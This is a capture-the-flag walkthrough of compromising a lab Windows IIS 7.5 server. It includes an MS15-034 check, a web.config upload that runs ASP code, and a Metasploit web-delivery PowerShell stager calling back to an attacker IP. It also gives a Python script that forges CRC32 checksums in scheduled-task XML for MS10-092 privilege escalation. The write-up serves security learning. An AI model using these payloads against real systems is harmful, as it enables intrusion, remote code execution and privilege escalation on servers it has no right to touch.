1) Locate the file upload page
2) Upload a web shell by abusing an attacker-supplied web.config file
3) Establish a reverse connection with the MSF web delivery module
4) Check for privilege escalation with the MSF local exploit suggester
5) Exploit ms10_092_schelevator to become administrator
We start off with a basic nmap scan and learn that port 80 is open. From there we run a scan covering all ports with the -p- flag. Seeing that no high ports are open, we follow up with a more in-depth scan using the -sC -sV flags, which run the default nmap scripts and version detection.
Port 80 reports Microsoft-IIS/7.5, so our entry point is fairly limited and we browse to the website. Here we are greeted by a trolling magical wizard, a strong hint that we need to look elsewhere.
Directory busting with several wordlists turned up absolutely nothing at first. After reading the forums I learned that the wordlist has to match the target: this is a Windows server running IIS, and the connection finally came when I ran a wordlist with the .aspx extension (ASP.NET pages).
The page shows only an upload button, and my knee-jerk reaction was to start uploading reverse and web shells, with no luck. I spent the majority of my time thereafter researching, and eventually came across an article explaining the known vulnerability MS15-034.
MS15-034 is a vulnerability in HTTP.sys, the kernel-mode driver that serves IIS, which allows remote code execution with nothing more than a specially crafted HTTP request.
The bug is an integer overflow in the handling of the Range header.
A Range header is normally used to request only part of a resource.
We can check whether the server accepts range requests (look for an Accept-Ranges: bytes header in the reply) with
curl -I 10.10.10.93
We then check if the server is vulnerable to MS15-034 with
curl -v 10.10.10.93 -H "Host: anything" -H "Range: bytes=0-18446744073709551615"
The response indicated the server was vulnerable: an unpatched HTTP.sys answers the oversized range with 416 Requested Range Not Satisfiable, while a patched one rejects the request as having an invalid header. So I launched the Metasploit module auxiliary/scanner/http/ms15_034_http_sys_memory_dump to leak kernel memory.
This was a great find, but it won't go anywhere unless I am willing to start modifying the auxiliary module, since the public modules only leak memory or crash the host. I did manage to trigger the denial of service (auxiliary/dos/http/ms15_034_ulonglongadd), which was not helpful, but interesting.
I later came across an article on abusing an uploaded web.config file for RCE on IIS.
Giving this a once-over, I was able to upload my own web.config into the upload directory. IIS reads a web.config from every directory it serves, so an attacker-controlled copy can register a handler that executes .config files as classic ASP and lift the request-filtering rules that normally block them. The proof of concept embeds ASP code that returns the value "3" to the screen when the file is requested. Here we simply create a file named web.config and place our malicious code inside.
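The proof-of-concept web.config for that technique, shown here as an added example rather than the exact file uploaded during the box. It assumes classic ASP is installed on the server and a 64-bit application pool (preCondition="bitness64"; use bitness32 for a 32-bit pool). The handler entry maps every *.config request to asp.dll, the requestFiltering block removes the default rules that refuse .config extensions and hide web.config, and the ASP code sits inside an XML comment so the file still parses as valid configuration:

```xml
<?xml version="1.0" encoding="UTF-8"?>
<configuration>
  <system.webServer>
    <!-- Execute any *.config file in this directory as classic ASP -->
    <handlers accessPolicy="Read, Script, Write">
      <add name="web_config" path="*.config" verb="*" modules="IsapiModule"
           scriptProcessor="%windir%\system32\inetsrv\asp.dll"
           resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" />
    </handlers>
    <!-- Undo the default filtering that blocks .config requests and hides web.config -->
    <security>
      <requestFiltering>
        <fileExtensions>
          <remove fileExtension=".config" />
        </fileExtensions>
        <hiddenSegments>
          <remove segment="web.config" />
        </hiddenSegments>
      </requestFiltering>
    </security>
  </system.webServer>
</configuration>
<!--
<% Response.write("-"&"->")
Response.write(1+2)
Response.write("<!-"&"-")
%>
-->
```

When IIS serves the file through asp.dll, the script first writes "-->" to close the comment in the output, then writes 3, then reopens a comment so the trailing "-->" of the file is swallowed. Requesting uploadedfiles/web.config and seeing a bare 3 in the body confirms that the handler mapping took effect and ASP is executing, which is the check to run before appending a real shell.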
We then tried a reverse connection, which did not work, followed by a web shell. The ASP web shell kind of worked, giving me this.
I then tried nishang and got nowhere.
More research suggested web shells were the usual route for this vulnerability, and I eventually came across a web shell that fit.
I copied that web shell, appended it to the bottom of our web.config, and executed it by browsing to the uploadedfiles/web.config location.
I ran commands but received no output. I reviewed the source again and saw nothing that suggested output was being suppressed, so I researched and tried various PowerShell commands to call back a reverse shell. I had absolutely no luck until someone pointed me to Rapid7's script web delivery module (exploit/multi/script/web_delivery). It starts a web server hosting a payload and generates an encoded one-liner for the target that downloads and runs it.
I opened Metasploit and loaded the module.
Target 2 is PSH, which stands for PowerShell. Running the module spins up the server and prints a base64-encoded PowerShell one-liner that fetches the stager with DownloadString and executes it in memory; that one line is all the target has to run.
set lhost 10.10.14.57
set srvhost 10.10.14.57
set payload windows/x64/meterpreter/reverse_tcp
set target 2
I decoded the encoded text to take a look at the exact command.
From here we copy the one-liner and paste it into the web shell in the browser.
With our reverse connection we browse to merlin's desktop and grab the user flag.
Something really useful here is Metasploit's local exploit suggester (post/multi/recon/local_exploit_suggester). Background the meterpreter session, load the module, and point its SESSION option at the session holding our reverse connection.
[Image: local exploit suggester output]
The suggester lists a lot of candidate exploits, and we go through them to see what sticks. I finally had success with exploit/windows/local/ms10_092_schelevator.
ms10_092_schelevator abuses the Task Scheduler 2.0 XML vulnerability, the zero-day used by Stuxnet. Scheduled task definitions are stored as XML and guarded only by a CRC32 checksum. CRC32 is not a cryptographic hash, so an attacker can edit the task XML to inject a command and then append a few bytes that force the checksum back to its original value; the tampered task passes the integrity check and the command runs with elevated privileges.
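The checksum bypass in one place, as an added example that is not the Metasploit module's code: edit a task XML, then force its CRC32 back to the original by patching four bytes inside a trailing comment. The task XML and the payload path are constructed for illustration; the CRC forcing is the general 4-byte technique (it works for any prefix, suffix and target), so the same helper can put the fix-up anywhere in a file, not only at the end.

```python
# Added example: forcing a CRC32 to a chosen value by patching 4 bytes, the
# primitive behind the MS10-092 task-file checksum bypass. Not the module's code.
import zlib
import xml.etree.ElementTree as ET

POLY = 0xEDB88320  # reflected CRC-32 polynomial, same as zlib


def _make_table():
    table = []
    for i in range(256):
        c = i
        for _ in range(8):
            c = (c >> 1) ^ POLY if c & 1 else c >> 1
        table.append(c)
    return table


TABLE = _make_table()
# Every table entry has a distinct top byte, which is what makes one update
# step reversible once the output register is known.
REV = {TABLE[i] >> 24: i for i in range(256)}
assert len(REV) == 256


def crc_step(reg, byte):
    """One byte of the zlib-style update on the raw (un-finalised) register."""
    return TABLE[(reg ^ byte) & 0xFF] ^ (reg >> 8)


def crc_unstep(reg, byte):
    """Inverse of crc_step when the consumed byte is known."""
    idx = REV[reg >> 24]
    return ((reg ^ TABLE[idx]) << 8) | (idx ^ byte)


def state_after(data):
    """Raw register after feeding data, starting from the 0xFFFFFFFF init."""
    return zlib.crc32(data) ^ 0xFFFFFFFF


def force_crc32(prefix, suffix, target):
    """Return 4 bytes p such that zlib.crc32(prefix + p + suffix) == target."""
    want = target ^ 0xFFFFFFFF        # register needed at end of file
    for b in reversed(suffix):        # undo the suffix: register needed before it
        want = crc_unstep(want, b)
    # The four table indices are fixed by 'want' alone; the prefix only decides
    # which input bytes select those indices.
    idx = []
    x = want
    for _ in range(4):
        i = REV[x >> 24]
        idx.append(i)
        x = (x ^ TABLE[i]) << 8
    idx.reverse()
    reg = state_after(prefix)
    patch = bytearray()
    for i in idx:
        b = (reg ^ i) & 0xFF
        patch.append(b)
        reg = crc_step(reg, b)
    return bytes(patch)


def forge_task_xml(original, modified):
    """Return the modified task XML plus a comment that restores original's CRC32."""
    target = zlib.crc32(original)
    head, close, tail = modified.rpartition(b"</Task>")
    suffix = b" -->" + close + tail
    # Keep the file well-formed: the forced bytes must be printable ASCII and
    # must not contain '-', so vary a printable nonce until they are.
    for nonce in range(1 << 16):
        prefix = head + b"<!-- crc %04x " % nonce
        patch = force_crc32(prefix, suffix, target)
        if all(0x20 <= b <= 0x7E and b != 0x2D for b in patch):
            return prefix + patch + suffix
    raise RuntimeError("no printable fix-up found")


# Constructed sample task definition (not a real Windows task file)
ORIGINAL = (b'<?xml version="1.0" encoding="UTF-8"?>\n'
            b'<Task version="1.2">\n'
            b'  <Principals><Principal><UserId>NT AUTHORITY\\SYSTEM</UserId></Principal></Principals>\n'
            b'  <Actions><Exec><Command>C:\\Windows\\System32\\notepad.exe</Command></Exec></Actions>\n'
            b'</Task>\n')


def checksum(data):
    return zlib.crc32(data)


def demo():
    """Swap the task's command for a hypothetical payload path, keeping the CRC32."""
    modified = ORIGINAL.replace(b"System32\\notepad.exe", b"Users\\Public\\payload.exe")
    forged = forge_task_xml(ORIGINAL, modified)
    ET.fromstring(forged)  # raises if the fix-up broke well-formedness
    return forged


if __name__ == "__main__":
    out = demo()
    print(out.decode())
    print("crc32 original %08x forged %08x" % (checksum(ORIGINAL), checksum(out)))
```

The forced bytes are appended inside a comment so that any XML consumer still parses the file; whether a particular task-file parser tolerates such a comment is an assumption of this example, not something the write-up establishes. The lesson for defenders is the same either way: a CRC protects against accidental corruption, not against an attacker who can write the file.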
We load the exploit, set our options, and point SESSION at session 1, our original session with the reverse connection.
We become administrator and are able to cat the root flag.
This was a fantastic box and I thoroughly enjoyed it.